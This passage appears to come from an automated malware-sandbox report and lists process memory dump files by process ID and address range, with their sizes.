          • memory/3712-657-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-656-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-658-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-660-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-659-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-664-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/4176-331-0x00007FFD1DB90000-0x00007FFD1DB92000-memory.dmp

            Filesize

            8KB

          • memory/4176-332-0x00007FFD1DBA0000-0x00007FFD1DBA2000-memory.dmp

            Filesize

            8KB

          • memory/4176-333-0x0000000140000000-0x0000000140E3D000-memory.dmp

            Filesize

            14.2MB

          • memory/4232-652-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4232-648-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4232-655-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4232-649-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4232-650-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4232-651-0x0000000140000000-0x000000014000E000-memory.dmp

            Filesize

            56KB

          • memory/4308-321-0x0000000000400000-0x00000000008F2000-memory.dmp

            Filesize

            4.9MB

          • memory/4308-318-0x0000000000400000-0x00000000008F2000-memory.dmp

            Filesize

            4.9MB